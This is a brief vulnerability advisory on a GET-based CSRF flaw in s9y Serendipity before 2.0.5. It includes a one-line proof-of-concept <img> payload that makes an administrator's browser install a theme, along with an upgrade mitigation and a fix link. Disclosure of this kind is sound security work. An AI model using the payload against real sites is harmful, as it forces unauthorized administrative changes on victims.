s9y Serendipity Cross Site Request Forgery

s9y Serendipity versions prior to 2.0.5 suffer from a cross site request forgery vulnerability.


MD5 | 6d7bd3fb925761c7ecfe0423c5e1fd4b

Details

======


Software: s9y Serendipity

Version: <2.0.5

Homepage: https://docs.s9y.org/


=======


Description

================

Get type CSRF in Serendipity allows attacker installs any themes, no token here.


POC:


========


include this in the page ,then attack will occur:


<img src="http://127.0.0.1/serendipity/serendipity_admin.php?serendipity%5BadminModule%5D=templates&serendipity%5BadminAction%5D=install&serendipity%5Btheme%5D=bartleby&serendipity%5Bspartacus_fetch%5D=bartlebya>



Mitigations

=======


update to Serendipity v2.1.x


========


FIX:


==========


https://github.com/s9y/Serendipity/issues/452


Best regards,


Zhiyang Zeng of Tencent security platform department

Related Posts

Comments